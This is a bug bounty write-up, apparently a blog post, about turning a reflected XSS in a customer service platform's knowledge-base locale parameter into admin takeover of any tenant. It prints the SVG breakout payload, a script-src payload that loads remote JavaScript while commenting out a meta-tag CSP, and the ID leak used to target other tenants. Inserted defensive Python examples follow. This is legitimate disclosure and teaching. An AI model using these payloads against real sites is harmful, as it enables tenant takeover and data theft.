The one where I owned a customer service platform

5 months ago

Un1tycyb3r

Let’s refer to this platform as ABC Communications since they don’t allow disclosure. Let’s dive into this awesome bug I found, where I turned a simple XSS into a cool but simple bug chain that allowed me to add myself as an admin of any tenant of this particular customer service platform.

I spent about 40 hours on this application. I dove deep. I was on vacation with my family when this all started, and I spent an unhealthy amount of time just walking through the application, understanding the logic and the protection mechanisms. At 40 hours, I was kind of over it, but… there was some functionality that I hadn’t looked at. There was a knowledge-base feature of the app that looked a little different from everything else, which always piques my interest. When things look different, they were probably handled differently in development, and when devs deviate from how they did things in the rest of the application, this typically breeds bugs.

I opened Caido and just started stepping through everything. At first, nothing really interesting caught my eye; for the most part, the data flowed the same way as in the rest of the app, and after a few hours I decided to take a break to grab an energy drink and let my mind rest before getting back to it. When I came back to my laptop, I noticed a single new issue in my Caido findings tab. I use a cool workflow by bebiksior called ‘Caido Reflector.’ It creates a finding whenever it detects a query value reflected in the response, and it had detected that the locale parameter on this one page was being reflected. I threw in a simple payload to verify I could break out of the context, and sure enough I could break out and reflect directly into the page. The typical `"><script>alert()</script>` payload popped CSP errors, but `"><svg onload=alert()>` gave me the coveted alert box and I breathed a sigh of relief.
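As an added illustration (this is not code from the post, nor from the Caido Reflector workflow), here is the core of the check that such a workflow automates: compare each query value against the response body and report whether it came back raw or HTML-escaped, then probe a page renderer with a canary that carries the attribute-breakout characters. The two renderers, the `kb.example.test` host and the way `locale` is interpolated are constructed stand-ins for the knowledge-base page, not the platform's code.

```python
import html
from urllib.parse import parse_qsl, urlencode, urlsplit

# Canary value containing the three characters that matter in attribute and
# tag context. If it comes back byte-for-byte, the page reflects unescaped.
CANARY = 'rfl7"<>'


def find_reflections(url: str, body: str) -> dict:
    """Map each query parameter name to how its value appears in the body.

    'raw'     - the exact value is present (candidate for context breakout)
    'escaped' - only the HTML-escaped form is present (output encoding in place)
    Parameters whose value is not reflected at all are omitted.
    """
    results = {}
    for name, value in parse_qsl(urlsplit(url).query):
        if len(value) < 4:          # short values match by accident too often
            continue
        escaped = html.escape(value, quote=True)
        if value in body:
            results[name] = "raw"
        elif escaped != value and escaped in body:
            results[name] = "escaped"
    return results


def reflects_raw(render, param: str = "locale") -> bool:
    """Probe a page renderer with the canary and report a raw reflection."""
    url = "https://kb.example.test/?" + urlencode({param: CANARY})  # constructed host
    return find_reflections(url, render(CANARY)).get(param) == "raw"


def render_vulnerable(locale: str) -> str:
    """Constructed stand-in for the knowledge-base page: the locale query
    value is interpolated into an attribute without encoding."""
    return ('<html><head>'
            f'<link rel="alternate" hreflang="{locale}">'
            '</head><body>Help center</body></html>')


def render_fixed(locale: str) -> str:
    """Same page with the value HTML-attribute-encoded before interpolation."""
    return ('<html><head>'
            f'<link rel="alternate" hreflang="{html.escape(locale, quote=True)}">'
            '</head><body>Help center</body></html>')


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        print(f"{name}: raw reflection of locale = {reflects_raw(render)}")
```

The canary approach is what makes this a useful regression check: a plain value such as `en-US` is reported as raw by both renderers, because its escaped form is identical to itself, so only a value containing `"`, `<` and `>` tells you whether output encoding is actually applied.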

So this XSS was already impactful, to the point that I could grab the x-csrf-token header value from the cookies, which allowed me to bypass protections, but putting all of that code in the URL was a hassle and I wanted the ability to do more with my XSS. I started looking at the CSP that was restricting me, and I noticed yet another difference in how this part of the application worked. Instead of a server-side CSP delivered in the response headers, they loaded it via a `<meta>` tag that came after my injection point. This meant that by appending `<!---` to my payload, I could comment out the CSP. I laughed when it worked. So now I could work with the following payload: `"><script src='https://poc.un1tycyb3r.com/poc.js'></script><!---`.
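The comment trick works only because the policy is part of the same document the injection lands in. As an added example (not the post's code and not the platform's), the following models the two delivery paths side by side: a renderer that reflects `locale` raw and places the CSP in a `<meta>` tag after the reflection point, beside one that output-encodes the value and sends the policy as a response header. The comment-aware scanner is a deliberately simplified model of the browser tokenizer (an unterminated `<!--` runs to the end of input); the page markup, the policy string, the header dictionary and the renderer names are all constructed for this example.

```python
import html
import re
from typing import Optional

META_CSP = re.compile(
    r'<meta\s+http-equiv="Content-Security-Policy"\s+content="([^"]*)"\s*/?>', re.I)

# Constructed policy; any value would do for the demonstration.
POLICY = "default-src 'self'; script-src 'self'"


def csp_visible_to_browser(body: str) -> Optional[str]:
    """Return the CSP a browser would take from a <meta> tag, or None.

    Simplified tokenizer model: text between '<!--' and '-->' is a comment,
    and a comment with no closing '-->' extends to the end of the document.
    Tags inside a comment never exist as far as the browser is concerned.
    """
    pos, visible = 0, []
    while True:
        start = body.find("<!--", pos)
        if start < 0:
            visible.append(body[pos:])
            break
        visible.append(body[pos:start])
        end = body.find("-->", start + 4)
        if end < 0:
            break                      # unterminated: the rest is comment
        pos = end + 3
    match = META_CSP.search("".join(visible))
    return match.group(1) if match else None


def effective_csp(headers: dict, body: str) -> Optional[str]:
    """A header policy is applied before any markup is parsed, so it cannot
    be affected by what the page body contains; fall back to <meta> otherwise."""
    for name, value in headers.items():
        if name.lower() == "content-security-policy":
            return value
    return csp_visible_to_browser(body)


def page_meta_csp(locale: str):
    """Constructed vulnerable pattern: raw reflection, CSP in a <meta> tag
    that appears later in the markup than the reflected value."""
    body = ('<html><head>'
            f'<link rel="alternate" hreflang="{locale}">'
            f'<meta http-equiv="Content-Security-Policy" content="{POLICY}">'
            '</head><body>Help center</body></html>')
    return {}, body


def page_header_csp(locale: str):
    """Constructed hardened pattern: attribute-encoded output and the same
    policy delivered as a response header."""
    body = ('<html><head>'
            f'<link rel="alternate" hreflang="{html.escape(locale, quote=True)}">'
            '</head><body>Help center</body></html>')
    return {"Content-Security-Policy": POLICY}, body


if __name__ == "__main__":
    # A value shaped like an attribute breakout followed by a comment opener,
    # constructed to show the difference between the two delivery paths.
    injected = 'en-US"><!--'
    for label, page in (("meta CSP", page_meta_csp), ("header CSP", page_header_csp)):
        print(f"{label}, normal value : {effective_csp(*page('en-US'))!r}")
        print(f"{label}, injected value: {effective_csp(*page(injected))!r}")
```

Two things follow from running it. First, even with the meta tag, the policy would survive if the reflected value were encoded, so output encoding is the primary fix and CSP is defence in depth. Second, a policy that is meant to be defence in depth should be delivered in a way the attacker-controlled part of the document cannot touch, which for CSP means the response header.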

Being able to load my own scripts gave me a lot of freedom in building my payload. With knowledge of all the different requests, I chose to make a PoC that adds my attacker account as an admin of the victim tenant. I probably tested and retested the PoC 15 times, and to my joy it worked every time. My exploit could effectively give me control over any tenant on the platform that I chose to target.

After submitting to the program, I was feeling pretty good, until they downgraded it to a medium. They insisted that it was only exploitable by members of the same organization. The structure of the endpoint was like so: /blah/company-id/blah/unique-id/blah/unique-id. I knew it was externally exploitable, but I needed to show irrefutable proof that I could craft the exploit for any company. It was at this point that I remembered where I could get those values. The knowledge bases had a publicly accessible, front-facing endpoint, and a script tag towards the bottom of the page leaked the company ID and the two unique IDs that I needed to build the exploit for any company I wanted to target. All I had to do was go to their front-facing knowledge base and grab those values. I did a PoC against the program’s test account, and it was a great feeling to get the following reply when it worked: “Noted. Adjusting back to high.”

Not only did they adjust the severity to high, but because of the work I put in to show max impact, I was awarded the maximum bounty for a high severity bug.

Some takeaways I think you should walk away with:

- Get intimate with the application you are assessing. Those quirky or specific details could be the difference between a medium and a high, or even a high and a crit.
- Show max impact. Don’t just submit a bug. Demonstrate the maximum amount of impact and be detailed in your attack scenario. Programs appreciate the extra work you put in and the good ones will award you accordingly.
- Always be aware of parts of the app that look and behave differently from the rest. Bugs galore exist in the deviations from the norm.

Hope you enjoyed the writeup!

Till next time,

un1tycyb3r
